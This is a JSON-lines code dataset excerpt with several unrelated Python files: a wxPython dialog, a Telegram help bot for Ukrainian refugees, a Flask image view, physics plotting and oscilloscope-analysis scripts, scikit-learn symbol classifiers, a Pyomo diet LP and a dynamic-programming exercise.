Contributor',wx.OK)\n dlg.ShowModal()\n dlg.Destroy()\n return\n elif (len(self.theAffiliation) == 0):\n dlg = wx.MessageDialog(self,'No affiliation',self.commitLabel + ' Contributor',wx.OK)\n dlg.ShowModal()\n dlg.Destroy()\n return\n elif (len(self.theRole) == 0):\n dlg = wx.MessageDialog(self,'No role',self.commitLabel + ' Contributor',wx.OK)\n dlg.ShowModal()\n dlg.Destroy()\n return\n else:\n self.EndModal(armid.CONTRIBUTORENTRY_BUTTONCOMMIT_ID)\n\n def firstName(self): return self.theFirstName\n def surname(self): return self.theSurname\n def affiliation(self): return self.theAffiliation\n def role(self): return self.theRole\n","sub_path":"cairis/cairis/ContributorEntryDialog.py","file_name":"ContributorEntryDialog.py","file_ext":"py","file_size_in_byte":4461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"346057023","text":"# Bot helper fragment for refugee women from Ukraine\n\n# pip install aiogram\nimport sys\nimport logging\n\nfrom aiogram import Bot, Dispatcher, executor\nfrom aiogram.types import Message, \\\n InlineKeyboardButton, InlineKeyboardMarkup\n# CallbackQuery, KeyboardButton\n\nfrom config import TOKEN_KEY\n\n#photo = open('logo.png', 'rb')\n\n#sys.path.append('../../')\n\n#logging.basicConfig(level=logging.INFO)\n\nTOKEN = TOKEN_KEY\nprint(TOKEN)\nbot = Bot(TOKEN)\ndp = Dispatcher(bot)\n\n\n\nfrom aiohttp import ClientSession\n\nfrom config import MEASUREMENT_ID, API_SECRET\n\n\nasync def send_analytics(user_id, user_lang_code, action_name):\n \"\"\"\n Send record to Google Analytics\n \"\"\"\n params = {\n 'client_id': str(user_id),\n 'user_id': str(user_id),\n 'events': [{\n 'name': action_name,\n 'params': {\n 'language': user_lang_code,\n 'engagement_time_msec': '1',\n }\n }],\n }\n async with ClientSession() as session:\n await session.post(\n f'https://www.google-analytics.com/'\n f'mp/collect?measurement_id={MEASUREMENT_ID}&api_secret={API_SECRET}',\n json=params)\n\n\n\n# Пишем команду с приветствием и заставкой\n@dp.message_handler(commands=['start'])\nasync def callback_start(message: Message):\n #await bot.send_photo(chat_id=message.chat.id, photo=open('logo.png', 'rb').read())\n await bot.send_photo(chat_id=message.chat.id, photo='https://raw.githubusercontent.com/d-k-git/tg-bot/main/logo.png')\n #await bot.send_photo(chat_id=message.chat.id, photo=types.InputFile.from_url('logo.png'))\n await bot.send_message(\n chat_id=message.chat.id,\n reply_markup=choose_lang,\n text=\"Привет, я справочный чат-бот. Помогу вам. 
Выберите язык:\")\n\n# Пишем команду с приветствием и заставкой\n@dp.message_handler(commands=['language'])\nasync def callback_language(message: Message):\n await bot.send_message(\n chat_id=message.chat.id,\n reply_markup=choose_lang,\n text=\"Выберите язык:\")\n\n await send_analytics(user_id=message.from_user.id,\n user_lang_code=message.from_user.language_code,\n action_name='select_lang_rus')\n\n# Создаем первую клавиатуру c выбором языка\nchoose_lang = InlineKeyboardMarkup().row(\n InlineKeyboardButton(text=\"Українськa\", callback_data=\"get-UKR\"),\n InlineKeyboardButton(text=\"Русский\", callback_data=\"get-RUS\"))\n\n\n# Указываем, что сделать при нажатии на кнопку после выбора языка:\n@dp.callback_query_handler(lambda c: c.data == 'get-UKR')\nasync def get_UKR(message: Message):\n await bot.send_message(\n chat_id=message.from_user.id,\n reply_markup=chosen_ukr,\n text=\"Виберіть країну:\")\n\n await send_analytics(user_id=message.from_user.id,\n user_lang_code=message.from_user.language_code,\n action_name='select_lang_ukr')\n\n@dp.callback_query_handler(lambda c: c.data == 'get-RUS')\nasync def get_RUS(message: Message):\n await bot.send_message(\n chat_id=message.from_user.id,\n reply_markup=chosen_rus,\n text=\"Выберите страну:\")\n\n\n# --------- ЗДЕСЬ ВЫБОР СТРАНЫ И РАЗДЕЛА ---------\nchosen_rus = InlineKeyboardMarkup(row_width=2).add(\n InlineKeyboardButton(text=\"Германия\", callback_data=\"DEU_rus\"),\n InlineKeyboardButton(text=\"Польша\", callback_data=\"POL_rus\"),\n)\nchosen_ukr = InlineKeyboardMarkup(row_width=2).add(\n InlineKeyboardButton(text=\"Німеччина\", callback_data=\"DEU_ukr\"),\n InlineKeyboardButton(text=\"Польща\", callback_data=\"POL_ukr\"),\n)\n\n\n# ------- Доступные разделы по стране: ГЕРМАНИЯ -------\nDEU_chosen_service_rus = InlineKeyboardMarkup(row_width=2).add(\n InlineKeyboardButton(text=\"Безопасность\", callback_data=\"DEU_sec_main_rus\"),\n)\n\nDEU_chosen_service_ukr = InlineKeyboardMarkup(row_width=2).add(\n InlineKeyboardButton(text=\"Безпека\", callback_data=\"DEU_sec_main_ukr\"),\n)\n\n\n# ------- Доступные разделы по стране: ПОЛЬША -------\nPOL_chosen_service_rus = InlineKeyboardMarkup(row_width=2).add(\n InlineKeyboardButton(text=\"Безопасность\", callback_data=\"POL_sec_main_rus\"),\n InlineKeyboardButton(text=\"Медицина\", callback_data=\"POL_med_main_rus\"),\n InlineKeyboardButton(text=\"Работа\", callback_data=\"POL_wrk_main_rus\"),\n InlineKeyboardButton(text=\"Проживание\", callback_data=\"POL_res_main_rus\"),\n InlineKeyboardButton(text=\"Юридическая помощь\", callback_data=\"POL_law_main_rus\"),\n InlineKeyboardButton(text=\"Бытовые вопросы\", callback_data=\"POL_day_main_rus\"),\n)\n\nPOL_chosen_service_ukr = InlineKeyboardMarkup(row_width=2).add(\n InlineKeyboardButton(text=\"Безпека\", callback_data=\"POL_sec_main_ukr\"),\n InlineKeyboardButton(text=\"Медицина\", callback_data=\"POL_med_main_ukr\"),\n InlineKeyboardButton(text=\"Робота\", callback_data=\"POL_wrk_main_ukr\"),\n InlineKeyboardButton(text=\"Проживання\", callback_data=\"POL_res_main_ukr\"),\n InlineKeyboardButton(text=\"Юридична допомога\", callback_data=\"POL_law_main_ukr\"),\n InlineKeyboardButton(text=\"Побутові питання\", callback_data=\"POL_day_main_ukr\"),\n)\n\n\n@dp.callback_query_handler(lambda c: c.data == \"DEU_rus\")\nasync def DEU_rus(message: Message):\n await bot.send_message(\n chat_id=message.from_user.id,\n reply_markup=DEU_chosen_service_rus,\n text=\"Выберите вид помощи:\")\n\n await send_analytics(user_id=message.from_user.id,\n 
user_lang_code=message.from_user.language_code,\n action_name='DEU_chosen_service_rus')\n\n@dp.callback_query_handler(lambda c: c.data == \"POL_rus\")\nasync def POL_rus(message: Message):\n await bot.send_message(\n chat_id=message.from_user.id,\n reply_markup=POL_chosen_service_rus,\n text=\"Выберите вид помощи:\")\n\n await send_analytics(user_id=message.from_user.id,\n user_lang_code=message.from_user.language_code,\n action_name='POL_chosen_service_rus')\n\n\n@dp.callback_query_handler(lambda c: c.data == \"DEU_ukr\")\nasync def DEU_ukr(message: Message):\n await bot.send_message(\n chat_id=message.from_user.id,\n reply_markup=DEU_chosen_service_ukr,\n text=\"Виберіть вид допомоги:\")\n await send_analytics(user_id=message.from_user.id,\n user_lang_code=message.from_user.language_code,\n action_name='DEU_chosen_service_ukr')\n\n\n@dp.callback_query_handler(lambda c: c.data == \"POL_ukr\")\nasync def POL_ukr(message: Message):\n await bot.send_message(\n chat_id=message.from_user.id,\n reply_markup=POL_chosen_service_ukr,\n text=\"Виберіть вид допомоги:\")\n\n\n# --------- ЗДЕСЬ ДЕРЕВО ПО РАЗДЕЛАМ И СТРАНАМ ---------\n# ------- РАЗДЕЛ: БЕЗОПАСНОСТЬ -------\n# ----- СТРАНА: ГЕРМАНИЯ -----\n# --- Кнопка БЕЗОПАСНОСТЬ : \"Безопасность\" ---\n# - Язык русский -\n# Клавиатура:\nDEU_sec_main_rus_buttons = InlineKeyboardMarkup(row_width=1)\nDEU_sec_main_rus_buttons = DEU_sec_main_rus_buttons.add(\n InlineKeyboardButton(text=(\n \"Другие варианты поддержки\"),\n callback_data=\"DEU_sec_other_rus\"),\n InlineKeyboardButton(text=(\n \"Как себя обезопасить\"),\n callback_data=\"DEU_sec_selfprotect_rus\"),\n InlineKeyboardButton(text=(\n \"Как распознать сутенёра и узнать, легальна ли работа\"),\n callback_data=\"DEU_sec_illegal_rus\"),\n InlineKeyboardButton(text=(\n \"Список ресурсов для помощи беженцам\"),\n callback_data=\"DEU_sec_general_rus\"),\n )\nDEU_sec_main_rus_buttons = DEU_sec_main_rus_buttons.row(\n InlineKeyboardButton(text=(\n \"🗂 К разделам\"), callback_data=\"DEU_rus\"),\n InlineKeyboardButton(text=(\n \"🌍 Другая страна\"), callback_data=\"get-RUS\"),\n InlineKeyboardButton(text=(\n \"🆘 SOS\"), callback_data=\"DEU_sec_main_rus\"))\n\n\n[...]\n\n\n# --------- ЗДЕСЬ ЗАКАНЧИВАЕТСЯ ДЕРЕВО ПО РАЗДЕЛАМ И СТРАНАМ ---------\n\n\nif __name__ == \"__main__\":\n # dp.register_message_handler(DEU_sec_other_rus, state=\"*\")\n executor.start_polling(dp)\n","sub_path":"Telegram_bot.py","file_name":"Telegram_bot.py","file_ext":"py","file_size_in_byte":8953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"309633438","text":"from flask import abort, current_app, render_template, jsonify, send_file\nfrom flask_classful import FlaskView, route\nfrom werkzeug.exceptions import NotFound\nfrom utils.image_utils import ImageCache\nimport traceback\n\nimport logging\nlogger = logging.getLogger(__name__)\n\nclass ImageView(FlaskView):\n @route('//')\n @route('/', defaults={'size': 1920})\n def index(self, size, path):\n try:\n cache = ImageCache.from_config(current_app.config)\n info = cache.get_image_info(path, size)\n did_cache = cache.cache_image(info)\n if current_app.config['ENV'] == 'production' and not did_cache:\n msg = ('Serving existing cached image in production env!'\n 'Static files should be sent by the web server.'\n '{}'.format(info))\n logger.warning(msg)\n return send_file(info.cached_path)\n except (KeyError, IOError, NotFound):\n logger.info('Image not found: {} ({}w)'.format(path, size))\n if current_app.config['ENV'] == 
'production':\n abort(404)\n else:\n return traceback.format_exc()\n","sub_path":"app/views/image_view.py","file_name":"image_view.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"538378812","text":"#!/usr/bin/env python\nimport ROOT\nimport CMS_lumi, tdrstyle\nimport argparse\nimport plot_functions as plotter\n\ndef main():\n plot_info = getPlotArgs()\n canvas = ROOT.TCanvas(\"canvas\", \"canvas\", 800, 600)\n hist = plotter.getHistFromFile(plot_info)\n if hist.InheritsFrom(\"TH2\"):\n # 2-D histograms are drawn as a color map; line/fill styling is irrelevant\n hist_opts = \"colz\"\n line_color = ROOT.kBlack\n fill_color = ROOT.kBlack\n elif plot_info[\"is_data\"]:\n hist_opts = \"e1\"\n line_color = ROOT.kBlack\n fill_color = ROOT.kBlack\n else:\n hist_opts = \"hist\"\n line_color = ROOT.kRed+4\n fill_color = ROOT.kOrange-8\n plotter.setHistAttributes(hist, plot_info, line_color, fill_color)\n plotter.makePlot(hist, hist_opts, plot_info)\n\ndef getPlotArgs():\n parser = plotter.getBasicParser()\n parser.add_argument(\"-n\", \"--file_name\", type=str, required=True,\n help=\"Name of root file where plots are stored\")\n parser.add_argument(\"--is_data\", action='store_true',\n help=\"Plot histogram with data points\")\n return vars(parser.parse_args())\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"make_plot.py","file_name":"make_plot.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"119962622","text":"import numpy as np\nfrom scipy.misc import imread\n\nwith open('./train.csv', 'r') as train_file:\n train_set_des = np.array(list(map(lambda x:x.split(','), train_file.read().split('\\n')[1:-1])))\n\ntrain_set = []\nfor i in train_set_des[:, 0:1].ravel():\n img = imread(i)\n train_set.append(img[:, :, 0:1].ravel())\n\ntrain_set = np.array(train_set)\ntrain_set_label = train_set_des[:, 2:3].ravel()\n\nwith open('./test.csv', 'r') as test_file:\n test_set_des = np.array(list(map(lambda x:x.split(','), test_file.read().split('\\n')[1:-1])))\n\ntest_set = []\nfor j in test_set_des[:, 0:1].ravel():\n img = imread(j)\n test_set.append(img[:, :, 0:1].ravel())\n\ntest_set = np.array(test_set)\ntest_set_label = test_set_des[:, 2:3].ravel()\ntest_set_length = len(test_set) # 16992 images in this fold\n\nprint('------------ k nearest neighbors(k vote) ----------')\nfrom sklearn.neighbors import KNeighborsClassifier\n\nknn_kvote = KNeighborsClassifier(n_neighbors=5)\nknn_kvote.fit(train_set, train_set_label)\n\nknn_kvote_pred = knn_kvote.predict(test_set)\nknn_kvote_error_rate = (knn_kvote_pred != test_set_label).sum() / test_set_length\nprint('error rate: %f' % knn_kvote_error_rate)\n\nprint('--------------------- linear svm --------------------')\nfrom sklearn.svm import LinearSVC\n\nsvm_lsvc = LinearSVC(dual=False, multi_class='ovr', verbose=False, random_state=233)\nsvm_lsvc.fit(train_set, train_set_label)\n\nsvm_lsvc_pred = svm_lsvc.predict(test_set)\nsvm_lsvc_error_rate = (svm_lsvc_pred != test_set_label).sum() / test_set_length\nprint('error rate: %f' % svm_lsvc_error_rate)\n\nprint('------------------- svm(with kernel trick) ---------------')\nfrom sklearn.svm import SVC\n\nsvm_svc = SVC(kernel='poly', tol=1e-4, random_state=233, verbose=True, decision_function_shape='ovr')\nsvm_svc.fit(train_set, train_set_label)\n\nsvm_svc_pred = svm_svc.predict(test_set)\nsvm_svc_error_rate = (svm_svc_pred != test_set_label).sum() / test_set_length\nprint('error rate: %f' % svm_svc_error_rate)\n\nprint('------------------- feed-forward neural network -----------')\nfrom 
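# MathSymbolRecog.py repeats (pred != labels).sum() / N by hand for every model;
# scikit-learn ships the complementary quantity as accuracy_score. A sketch of an
# equivalent helper (not part of the original script):
from sklearn.metrics import accuracy_score

def error_rate(y_true, y_pred):
    # Identical to (y_pred != y_true).mean() for equal-length label arrays.
    return 1.0 - accuracy_score(y_true, y_pred)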
sklearn.neural_network import MLPClassifier\n\nffnn = MLPClassifier(hidden_layer_sizes=(400, 400, 400, 400), tol=1e-6, activation='tanh', solver='adam', verbose=True)\nffnn.fit(train_set, train_set_label)\n\nffnn_pred = ffnn.predict(test_set)\nffnn_error_rate = (ffnn_pred != test_set_label).sum() / test_set_length\nprint('error rate: %f' % ffnn_error_rate)\n\n","sub_path":"HASYv2/classification-task/fold-1/MathSymbolRecog.py","file_name":"MathSymbolRecog.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"45167767","text":"from pyomo.environ import *\n\n# abstract Wyndor\ndailyReq = ['Carbs', 'Protein', 'Vitamins']\nfeeds = ['Corn', 'Tankage', 'Alfalfa']\ncost_rate = {'Corn': 2.1, 'Tankage': 1.8, 'Alfalfa':1.5}\nmin_nutrients = {'Carbs': 200, 'Protein': 180, 'Vitamins': 150}\nnutrients_per_kg = {\n 'Corn': {\n 'Carbs': 90,\n 'Protein': 30,\n 'Vitamins': 10\n },\n 'Tankage': {\n 'Carbs': 20,\n 'Protein': 80,\n 'Vitamins': 20\n },\n 'Alfalfa': {\n 'Carbs': 40,\n 'Protein': 60,\n 'Vitamins': 60\n }\n}\n\n#Concrete Model\nmodel = ConcreteModel()\n\n#Decision Variables\nmodel.weekly_feed = Var(feeds, domain=NonNegativeReals)\n\n#Objective\nmodel.cost = Objective(expr=sum(cost_rate[fd] * model.weekly_feed[fd]\n for fd in feeds),\n sense=minimize)\nmodel.cost.pprint()\n\nmodel.capacity = ConstraintList()\nfor dr in dailyReq:\n model.capacity.add(\n sum(nutrients_per_kg[fd][dr] * model.weekly_feed[fd]\n for fd in feeds) >= min_nutrients[dr])\n\nmodel.capacity.pprint()\n\n# Solve\nsolver = SolverFactory('glpk')\nsolver.solve(model)\n\n# display solution (again, we've changed to f-strings)\nprint(f\"Min cost = ${model.cost():,.2f}\")\nfor j in feeds:\n print(f\"Kg's of {j} = {model.weekly_feed[j]():.1f}\")","sub_path":"Homework/Lesson 02 Homework - LP2/HW2.5.py","file_name":"HW2.5.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"565864192","text":"#!/usr/bin/env python\n\nimport ScopeTrace \nimport sys, os, pylandau\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\nfrom scipy.signal import argrelextrema\nfrom itertools import product\nfrom random import choice\nimport numpy.polynomial.polynomial as poly\nimport time\nimport csv\nimport ScopeTrace\n\n#-------------------------------------------------------------------------------#\nclass ScopeData():\n\t\"\"\"\n\tThis is a class to manage a set of ScopeTrace objects.\n\t\"\"\"\n\tdef __init__(self, trace_folder_dir, param_dir=None, plot_dir=None):\n\t\t'''\n\t\tInitializes a ScopeData object.\n\n\t\t:param str trace_folder_dir: Directory to folder containing traces to be analyzed.\n\t\t:param str self.dir: Directory for traces.\n\t\t:param str/None/optional self.param_dir: Directory for the parameter list.\n\t\t'''\n\t\tself.dir = trace_folder_dir\n\t\tself.param_dir = param_dir\n\t\tself.plot_dir = plot_dir\n\n\t@staticmethod\n\tdef pulseFromFile(_dir, filename):\n\t\tscopeData=ScopeData(_dir)\n\t\tdata=scopeData.data_read(filename)\r\n\t\ttemplate=ScopeTrace.ScopeTrace(data)\n\t\treturn template\n\n\tdef data_read(self, filename):\n\t\t'''\n\t\tReturns ScopeTrace object from filename.\n\t\t:param str filename: String of filename. 
\n\n\t\t'''\n\t\twith open(self.dir + filename, \"r\") as file1: \n\t\t\tdata = file1.read()\n\t\t\treturn data\n\n\n\n\n\tdef save_parameters(self, output_dir=None, filename=None, plotting=False):\n\t\t'''\n\t\tSaves parameters. ::\n\t\t\n\n        #Type in the name of the directory where the data files are stored \n\t\t import os, ScopeData\n\t\t directory = #e.g. \"/home/kpark1/Work/SLab/data/\" \n\t\t for file in sorted(os.listdir(directory)):\n\t\t f = ScopeData.ScopeData(directory)\n\t\t f.data_read(file)\n\t\t f.save_parameters(plotting = False)\n\n\t\t:param str/None/optional output_dir: Directory for storing Landau fit parameters: mpv, eta, amp, and jitter (variance). The default is the working directory.\n\t\t:param str/None/optional filename: Name of the saved csv file. If None, a filename is created from the trace folder title. \n\t\t:param bool/optional plotting: If True, it plots each fitted curve. If False, it does not generate any graphs.\n\t\t'''\n\n\t\t#hack to prevent unwanted messages printing while fitting\n\t\tclass NullWriter(object):\n\t\t\tdef write(self, arg):\n\t\t\t\tpass\n\t\tnullwrite = NullWriter()\n\t\toldstdout = sys.stdout\n\n\t\t#initialize variables\n\t\tcount = 0\n\t\tlandau_param_list = []\n\t\tzero_time = time.time()\n\t\tfolder_size = len(os.listdir(self.dir))\n\n\t\t#Loops through files\n\t\tfor curr_file in sorted(os.listdir(self.dir)):\n\n\t\t\t#Prints progress\n\t\t\tcount += 1\n\t\t\tif plotting:\n\t\t\t\tprint(str(count) + ' of ' + str(folder_size))\n\t\t\telif time.time() - zero_time > 2:\n\t\t\t\tpercent_done = round(float(count)/float(folder_size) * 100, 2)\n\t\t\t\tprint('Progress: ' + str(percent_done) + '%')\n\t\t\t\tzero_time = time.time()\n\n\t\t\twith open(self.dir + curr_file, \"r\") as file1: \n\t\t\t\tdata = file1.read()\n\t\t\t\ttrace = ScopeTrace.ScopeTrace(data)\n\n\t\t\t#store parameters, silencing chatty fitter output via the NullWriter hack\n\t\t\ttry:\n\t\t\t\tbaseline, jitter = trace.find_baseline_and_jitter(trace.get_xmin(), trace.get_trigger_point())\n\t\t\texcept Exception:\n\t\t\t\tbaseline, jitter = trace.find_baseline_and_jitter(trace.get_xmin(), trace.get_xmin() + (trace.get_xmax() - trace.get_xmin())/10)\n\t\t\tsys.stdout = nullwrite\n\t\t\tparameters = trace.parameters()\n\t\t\tsys.stdout = oldstdout\n\t\t\tlandau_param_list.append([str(curr_file)] + parameters + [jitter])\n\n\t\t\t#plotting\n\t\t\tif plotting:\n\t\t\t\ttrace.plot(fit_param=parameters)\n\t\t\t\tplt.title(str(curr_file))\n\t\t\t\tplt.legend()\n\t\t\t\tself.save('Plot', output_dir, filename)\n\n\t\t#saving\n\t\tself.save('Data', output_dir, filename, rows=landau_param_list)\n\n\tdef save(self, kind, output_dir=None, filename=None, rows=None):\n\t\tif kind == 'Plot':\n\t\t\tif output_dir == None: #save to working directory if none specified\n\t\t\t\toutput_dir = str(os.getcwd())\n\t\t\tif filename == None:\t#generate filename if not specified\n\t\t\t\tfilename = self.dir.split('/')[-2] + '_plot'\n\t\t\tself.plot_dir = output_dir + '/' + filename\t#saves location of the plot\n\t\t\tplt.savefig(self.plot_dir+'.jpg')\n\t\t\tplt.clf()\n\t\telif kind == 'Data':\n\t\t\tif output_dir == None: #save to working directory if none specified\n\t\t\t\toutput_dir = str(os.getcwd())\n\t\t\tif filename == None:\t#generate filename if not specified\n\t\t\t\tfilename = self.dir.split('/')[-2] + '_parameters'\n\t\t\tself.param_dir = output_dir + '/' + filename\t#saves location of parameters\n\t\t\tsavefile = open(self.param_dir, 'w')\n\t\t\twith savefile:\n\t\t\t\twriter = csv.writer(savefile)\n\t\t\t\twriter.writerow(['Filename', 'MPV', 'Eta', 'Amp', 'Jitter(Variance)'])\n\t\t\t\twriter.writerows(rows or [])\n\t\telse:\n\t\t\traise ValueError('Invalid save type: ' + str(kind))\n\n\n\n\tdef search_pulses(self, conditions, parameters, and_or='and', plotting=True):\n\t\t'''\n\t\tReturns a list of files that satisfy conditions from a user input with an option of plotting the pulses.\n\t\tRequires a directory where parameters have already been saved. ::\n \n\n        #Type in the name of the directory where the data files are stored and the output directory\n\t\t import ScopeData\n\t\t directory = #e.g. \"/home/kpark1/Work/SLab/data/\"\n\t\t f = ScopeData.ScopeData(directory)\n\t\t f.save_parameters()\n\t\t print(f.search_pulses([lambda x: x < .002, lambda x: x < .004],\n ['amp', 'mpv'], plotting = False))\n\n\t \n\n\t\t:param list conditions: List of boolean functions. \n\t\t:param list parameters: List of parameters [mpv, eta, amp] to check if the conditions apply to them. The list must have the same length as conditions. \n\t\t:param str/optional and_or: String of either 'and' or 'or'. If the input is 'and', the method returns files that meet all of the given conditions. If the input is 'or', it returns files that meet any of the conditions. \n\t\t:param bool/optional plotting: If True, it plots the pulses from the data. \n\t\t'''\n\t\tstarred_files = []\n\t\tparam_dict = {'mpv': 1, 'eta': 2, 'amp': 3, 'jitter': 4} #maps str parameter input to location in list\n\n\t\t#loop through csv files\n\t\twith open(self.param_dir, 'r') as savefile:\n\t\t\treader = csv.reader(savefile)\n\t\t\tfirstline = True\n\t\t\tfor row in reader:\t#goes through each file's parameters\n\t\t\t\tif firstline:\t#checks if firstline and skips\n\t\t\t\t\tfirstline = False\n\t\t\t\t\tcontinue\n\t\t\t\telse:\n\t\t\t\t\tif and_or == 'and':\n\t\t\t\t\t\tmeets_conditions = True\n\t\t\t\t\t\ti = 0\n\t\t\t\t\t\twhile meets_conditions and i < len(conditions): #goes through each condition if all have\n\t\t\t\t\t\t\tmeets_conditions = conditions[i](float(row[param_dict[parameters[i]]])) #been met so far\n\t\t\t\t\t\t\ti += 1\n\n\t\t\t\t\telif and_or == 'or':\n\t\t\t\t\t\tmeets_conditions = False\n\t\t\t\t\t\tfor i in range(len(conditions)): #checks for any met condition\n\t\t\t\t\t\t\tif conditions[i](float(row[param_dict[parameters[i]]])):\n\t\t\t\t\t\t\t\tmeets_conditions = True\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\telse:\n\t\t\t\t\t\traise ValueError('Cannot read and/or input')\n\n\t\t\t\t\tif meets_conditions:\n\t\t\t\t\t\tdata_file_dir = self.dir + row[0]\n\t\t\t\t\t\tstarred_files.append(data_file_dir)\n\n\t\t\t\t\t\t#plotting\n\t\t\t\t\t\tif plotting:\n\t\t\t\t\t\t\t#initial settings\n\t\t\t\t\t\t\twith open(data_file_dir, \"r\") as data_file:\n\t\t\t\t\t\t\t\tdata = data_file.read()\n\t\t\t\t\t\t\t\ttrace = ScopeTrace.ScopeTrace(data)\n\t\t\t\t\t\t\t\ttrace.plot([float(row[1]), float(row[2]), float(row[3])])\n\t\t\t\t\t\t\t\tplt.title(row[0])\n\t\t\t\t\t\t\t\tself.save('Plot')\n\n\t\treturn starred_files\n\n\t\n\tdef histogram(self, parameter, hbins=10, hrange=None, hcolor= 'r', hedgecolor = 'k', halpha = .5):\n\t\t'''\n\t\tMakes a histogram of parameters.\n\t\tReturns the mean and standard deviation of a Gaussian fit to the histogram if parameter == 'eta' or 'jitter'::\n\n\t\t import ScopeData\n\t\t directory = \"/home/$USERNAME/Work/SLab/data/\"\n\t\t f = ScopeData.ScopeData(directory)\n\t\t f.histogram('jitter')\n\t\t plt.show()\n\n\t\t:param string parameter: Name of parameters among jitter, eta, mpv, and amp.\n\t\t:param integer/optional hbins: Number of bins.\n\t\t:param 
list/optional hrange: Histogram Range \n\t\t:param string/optional hcolor: Color of histogram bins\n\t\t:param string/optional hedgecolor: Color of edges of the bins\n\t\t:param float/optional halpha: Level of transparency in color of bins\n\t\t'''\n\t\tjitter, mpv, eta, amp = [], [], [], []\n\t\twith open(self.param_dir, \"r\") as savefile: \n\t\t\treader = csv.reader(savefile)\n\t\t\tfirstline = True\n\t\t\tfor row in reader:\t#goes through each file's parameters\n\t\t\t\tif firstline:\t#checks if firstline and skips\n\t\t\t\t\tfirstline = False\n\t\t\t\t\tcontinue\n\t\t\t\telse:\n\t\t\t\t\tmpv.append(float(row[1]))\n\t\t\t\t\teta.append(float(row[2]))\n\t\t\t\t\tamp.append(float(row[3]))\n\t\t\t\t\tjitter.append(float(row[4]))\n\n\t\tif parameter == 'jitter':\n\t\t\tparam_list = jitter\n\t\telif parameter == 'eta':\n\t\t\tparam_list = eta\n\t\telif parameter == 'mpv':\n\t\t\tparam_list = mpv\n\t\telif parameter == 'amp':\n\t\t\tparam_list = amp\n\t\telse:\n\t\t\traise ValueError(\"Parameter should be 'jitter', 'eta', 'mpv', or 'amp'!\")\n\n\t\tn, bins, patches = plt.hist(param_list, bins=hbins, range=hrange, color=hcolor, edgecolor=hedgecolor)\n\n\t\tbin_avg = []\n\t\tfor i in range(len(bins) - 1):\n\t\t\tbin_avg.append((bins[i] + bins[i+1])/2)\n\t\tbin_avg = np.array(bin_avg)\n\n\t\tnerror = []\n\t\tfor nval in n:\n\t\t\tnerror.append(float(np.sqrt(nval)))\n\t\tnerror = np.array(nerror)\n\n\t\tplt.errorbar(bin_avg, n, nerror, fmt ='o', label = 'Histogram for ' + str(self.dir.split('/')[-2]))\n\n\t\tif parameter == 'eta' or parameter == 'jitter':\n\t\t\ta_initial = max(n)\n\n\t\t\t#gets x values at peaks\n\t\t\tn_array = np.array(n)\n\t\t\tidbin = np.where(n_array == n_array.max())\n\t\t\t#if multiple x values of the same max y values, selects the first max\n\t\t\tidbin = idbin[0][0]\n\t\t\tmean_initial = bin_avg[idbin]\n\n\t\t\tsigma_initial = fwhm(bin_avg, n)\n\t\t\n\t\t\t#Gaussian fit\n\t\t\tlist1 = list(np.linspace(min(bin_avg), max(bin_avg), 100))\n\t\t\tpopt, pcov = curve_fit(gaus, bin_avg, n, p0 = [a_initial, mean_initial, sigma_initial])\n\n\t\t\tplt.plot(list1, gaus(list1, *popt), 'k', label = 'Gaussian Fit for ' + str(self.dir.split('/')[-2]))\n\n\n\t\tplt.xlabel(parameter + ' Value')\n\t\tplt.ylabel('Number of Events')\n\t\tplt.legend()\n\t\tself.save('Plot')\n\n\t\tif parameter == 'eta' or parameter == 'jitter':\n\t\t\treturn [float(popt[1]), float(popt[2])]\n\n","sub_path":"PulsePy/ScopeData.py","file_name":"ScopeData.py","file_ext":"py","file_size_in_byte":9930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"8110678","text":"# Uses python3\nimport sys\n\ndef evalt(a, b, op):\n if op == '+':\n return a + b\n elif op == '-':\n return a - b\n elif op == '*':\n return a * b\n else:\n assert False\n\noperands = []\nm = []\nM = []\n\ndef MinAndMax(i,j):\n minimum = sys.maxsize\n maximum = -sys.maxsize - 1\n for k in range(i,j):\n a = evalt(M[i][k], M[k+1][j], operands[k])\n b = evalt(M[i][k], m[k+1][j], operands[k])\n c = evalt(m[i][k], M[k+1][j], operands[k])\n d = evalt(m[i][k], m[k+1][j], operands[k])\n minimum = min(minimum, a, b, c, d)\n maximum = max(maximum, a, b, c, d)\n\n return minimum, maximum\n\n\ndef get_maximum_value(dataset):\n global m,M,operands\n data = list(dataset)\n digits = list(map(int,data[0::2]))\n operands = data[1::2]\n n = len(digits)\n\n m = [[0 for i in range(n)] for j in range(n)]\n M = [[0 for i in range(n)] for j in range(n)]\n\n for i in range(n):\n m[i][i] = digits[i]\n M[i][i] = 
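# ScopeData.histogram above calls gaus() and fwhm(), neither of which is defined in
# this excerpt (they presumably live elsewhere in the module). Plausible stand-ins,
# assuming a standard unnormalized Gaussian model for curve_fit and a histogram-based
# width estimate converted to a starting sigma (FWHM = 2.355 * sigma):
import numpy as np

def gaus(x, a, mean, sigma):
    # Model function matching the p0 = [a_initial, mean_initial, sigma_initial] order.
    return a * np.exp(-(np.asarray(x) - mean) ** 2 / (2.0 * sigma ** 2))

def fwhm(bin_centers, counts):
    # Crude full-width-at-half-maximum from binned counts, returned as a sigma guess.
    counts = np.asarray(counts)
    above = np.where(counts >= counts.max() / 2.0)[0]
    width = bin_centers[above[-1]] - bin_centers[above[0]]
    return width / 2.355 if width > 0 else 1.0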
